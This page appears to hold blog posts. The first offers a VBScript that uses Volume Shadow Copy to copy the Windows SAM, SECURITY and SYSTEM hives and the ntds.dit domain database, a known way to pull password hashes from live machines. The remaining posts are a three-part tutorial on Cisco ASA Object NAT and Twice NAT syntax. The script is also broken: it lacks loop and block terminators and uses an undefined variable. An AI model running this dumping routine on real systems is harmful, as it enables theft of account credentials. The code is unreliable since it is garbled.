
Dumping system hives and ntds.dit on live machines

This is nothing new if you follow security. A while back Tim Tomes and Mark Baggett discovered you could safely get at system hashes by dumping the system hives and the ntds.dit with the Volume Shadowcopy Service. Tim even wrote a vbscript that allowed you to interact with windows VSS in a very detailed manner and even on workstations that didn't include full vssadmin functionality. (http://pauldotcom.com/2011/11/safely-dumping-hashes-from-liv.html)

Well being a rather lazy geek I took his script and tooled it around a bit so it did everything for me. The result was a vbscript that runs on Windows Vista, 7, and 2008 that will dump the system hives and ntds.dit if found.

I am not a true code monkey so please forgive the sloppy code :)

'''Setting Variables'''
strComputer = "."
set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\cimv2")

'''Start VSS'''
set objListOfServices = objWMIService.ExecQuery("Select * from Win32_Service Where Name ='VSS'")
for each objService in objListOfServices

'''Create a new shadow copy'''
set objShadowStorage = objWMIService.Get("Win32_ShadowCopy")
varCreateResult = objShadowStorage.Create("C:\", "ClientAccessible", strShadowID)

'''Find the directory path for the shadow copy'''
set colListItems = objWMIService.ExecQuery("Select * from Win32_ShadowCopy")
for each objListItem in colListItems
    if objListItem.ID = strShadowID then
        strShadowPath = objListItem.DeviceObject
    end if

'''Copy the NTDS.DIT and SAM/SEC/SYS hives from the shadow copy volume'''
set objShell = wscript.CreateObject( "WScript.Shell" )
strComputerName = objShell.ExpandEnvironmentStrings( "%COMPUTERNAME%" )
set objFSO = CreateObject("Scripting.FileSystemObject")
strDestDir = CreateObject("Scripting.FileSystemObject").GetAbsolutePathName(".")
strShadowPath = replace(strShadowPath,"?",".",1,1)
strDumpPaths = array("\windows\system32\config\","\windows\system32\ntds\")
strDumpItems = array("SAM","SECURITY","SYSTEM","ntds.dit")
for each lstDumpPaths in strDumpPathsasreplaced
    for each lstDumpItems in strDumpItems
        strTempPath = strShadowPath & lstDumpPaths & lstDumpItems
        if objFSO.FileExists(strTempPath) then
            objFSO.CopyFile strTempPath, strDestDir & "\" & strComputerName & "-" & lstDumpItems, true
        end if

'''Delete the temporary shadow copy'''
set objDelItems = objWMIService.ExecQuery("Select * From Win32_ShadowCopy")
for each lstDelItem in objDelItems
    if lstDelItem.ID = strShadowID then
        varDelResult = lstDelItem.Delete_
    end if

ASA NAT Part 3 - Twice NAT Breakdown

Twice NAT Breakdown
Twice NAT can be a bit intimidating when your first look at it since the statements are much longer and have more variables. The best way I have found to approach it is to just break it down and look at it in chunks. It’s also important to note that Twice NAT requires the use of network and service objects. You can’t use straight up numbers for source or destination addresses and port numbers. Lastly all Twice NAT statements are added at the global config level.

ASA(config)# nat (original-interface,translated-interface) [line-number|{after-auto [line-number]}] source static|dynamic original-object interface|translated-object [destination static original-destination translated-destination] [service original-service-object translated-service-object] [dns] [unidirectional] [inactive] [description text]


(original interface,translated interface) - The “original interface” is the interface where object you are applying the NAT too exists and the “translated interface” is the interface where you are making your resource available. The ‘any’ keyword can be used when specifying the original or translated interfaces.

[line-number|{after-auto [line-number]}]

line-number – Optional. If you wish to insert the NAT rule at a specific location you can do so by using the line-number command. If omitted the rule will be appended to the end of section 1.

after-object [line-number] – Optional. If you want to mark the NAT rule to be processed in section three, after object NAT, use the after-object flag. Additionally if you specify a line number you may insert the after-object NAT at specific location in section 3.

Source address translation
source static|dynamic original-object interface|translated-object

source – Specifies the following commands are parameters for modifying the source address of a packet during translation.

static|dynamic – This simply notes if your performing a static or dynamic NAT.

original-object – This object identifies what source address or network we want to translate

interface|translated-object – Here is where we specify what we want our source address or network to be after translation. We can use either the interface address of the translated interface or an object.

Destination address translation
[destination static original-destination translated-destination]

destination – Specifies the following commands are parameters for modifying the destination address of a packet during translation.

static – Only option here. Tells the ASA we are doing a static translation on the destination address.

original-destination – This is where we identify the original destination address of a packet. Unless a packet has the destination address specified here the rule won’t apply.

translated-destination – Here we can change the destination address of a packet to something else.

Port translations
[service original-service-object translated-service-object]

service – Specifies the following commands are parameters for modifying the source and or destination port numbers of a packet during translation.

original-service-object – This is the service object that identifies the original source and or destination ports of a packet. Unless a packet has the source and or destination ports noted in this service object the rule won’t apply.

translated-service-object – This is where we can change the source and or destination ports of a packet.

Optional flags
[dns] [unidirectional] [inactive] [description {text}]

dns – This flags the rule for DNS re-writes. Can only be used on static 1 to 1 NAT.

unidirectional – NAT by nature is a two way process, but by using this flag a translation can be forced only work in a single direction.

inactive – This flag will prevent a rule from being used even though it is present.

description {text} – This flag lets us add a short description to a rule.

Like Object NAT it’s not a perfect system and it certainly has its fair share of annoyances, like not being able to use straight out numbers for addresses or ports. The biggest gotcha I found with Twice NAT is that service objects can have both source and destination ports defined. Its entirely possible to make rules that will never match any traffic and doing a simple ‘show run nat’ won’t display the contents of the objects so it can be very easy to overlook when troubleshooting a NAT issue. Overall though I think it’s a great system. It could use a few improvements for sure but that’s true of anything.

ASA NAT Part 2 - Object NAT Breakdown

Object NAT Breakdown
Since all Object NATs are properties of objects they are added at the object configuration level. This also makes the address or range defined in the object the original source. It may be a little weird at first when looking at an object NAT since you don’t explicitly define an original source like you would have with pre 8.3 NAT.

ASA(config-object-network)# nat (original-interface,translated-interface) source static|dynamic ip|object|interface [service tcp|udp source-port translated-port] [dns] [unidirectional] [inactive] [description text]


(original-interface,translated-interface) - The “original-interface” is the interface where the resource you are applying translation exists and the “translated-interface” is the interface where you are making your resource available. The ‘any’ keyword can be used when specifying the original or translated interfaces.

Source Address Translation
source static|dynamic ip|object|interface

source – Specifies the following commands are parameters for modifying the source address of a packet during translation.

static|dynamic – This simply notes if your doing a static or dynamic translation.

ip|object|interface – Here is where you specify the IP address, object, or interface you want your resource to use after translation. If you specify ‘interface’ the translation will use the address assigned to the translated interface denoted in first part of the command.

Port Translations
[service tcp|udp source-port translated-port]

service – Only available when doing static NAT.  When used this option gives you the ability to translate only a specific port or port rage. Just remember that you can only have one translation per object so if you need to do PAT for multiple discontiguous ports on the same host you need to setup multiple objects with the same host address.

tcp|udp – Used to specify a specific port or port range as being either a TCP or UDP port.

source-port – The “source-port” is the port on the host you want to make available.

translated-port – The “translated-port” is the port that will be visible on the translated address. If the source port is 80 and the translated port is 8080 then traffic hitting the translated address on port 8080 will be directed to the original address on port 80.

Optional Flags
[dns] [unidirectional] [inactive] [description {text}]

dns – This flags the rule for DNS re-writes. Can only be used on static 1 to 1 NAT.

unidirectional – NAT by nature is a two way process, but by using this flag a translation can be forced only work in a single direction.

inactive – This flag will prevent a rule from being used even though it is present.

description {text} – This flag lets us add a short description to a rule.

That covers the command structure for Object NAT. It has its own little annoyances like needing multiple objects for doing several static PATs to a single internal host but overall it’s a pretty simply way of doing NAT.

ASA NAT Part 1 - Introduction

I intended to publish this sooner but got wrapped up in life; new job, exams to study for and so on. Even though this is quite a few months late now that ASA 8.4 is out the door now it still a pretty solid summary on now the new NAT system works.

Much to the dismay of many the release of the ASA 8.3+ code base brought radical changes in the way NAT was done on the ASA. I was initially apprehensive about the change and cursed Cisco for such implementing such drastic and confusing changes. However, not all change is bad; after spending a few weeks of working with it and figuring it out I grew to love the new system. Withstanding a few minor annoyances, I found it to be a much more flexible and concise compared to the old way.

The first big change is that NAT has been redesigned around using objects. The second is that NAT was split into two forms: Object NAT and Twice NAT. In the first form, Object NAT, the translation becomes a property of an object. The second form, Twice NAT, has the ability to modify both the source and destination addresses of a packet with a single rule. Since we can do conditional translations with Twice NAT the old method of policy NAT with access-lists has been replaced with this new method.

One of the most important concepts to understand with the new system is how all the translation rules are ordered and processed by the firewall.  Any NAT commands entered are categorized and placed into one of three sections. The rules in each section as well as the sections themselves are then processed sequentially from top to bottom.

The first section is “Before Object NAT”. In this section rules are added with Twice NAT statements and can be manually ordered. It’s also important to note that remote access VPN clients will append entries to the end of this section so its important to be mindful of adding any rules that could overlap with your VPN client address ranges.

The second section is “Object NAT”. This section is where any rules that are properties of an object will appear. All the entries in this section are automatically ordered based on a few simple guidelines. First, static NATs will be placed before dynamic NATs. The next thing checked is the quantity of IPs being translated. A NAT with a large range of IPs will be processed before a NAT using a single IP. Finally, if multiple entries with the same number of IPs exist they will be sorted from lowest IP to highest IP. One of the big annoyances I have found with Object NAT is that only a single translation can be applied to any one object. In the case of multiple PATs on a single address the use of multiple objects with the same address is required; one object for each PAT rule.

The third section is “After Object NAT”. Functionally this section is identical to the first with the exception of being processed after the “Object NAT” rules. Rules are placed in this section through the use of a special flag in a Twice NAT statement.

The next big departure from the old method is how we write access-lists for our translated resources. In older versions of the code, when you wanted to allow incoming traffic to a public facing server you had to write an access-list that permitted traffic destined to your public facing IP address. In the post 8.3 world you now have to specify the IP or object of the internal host in your access-list instead of the public facing IP. Cisco calls this function Real IP.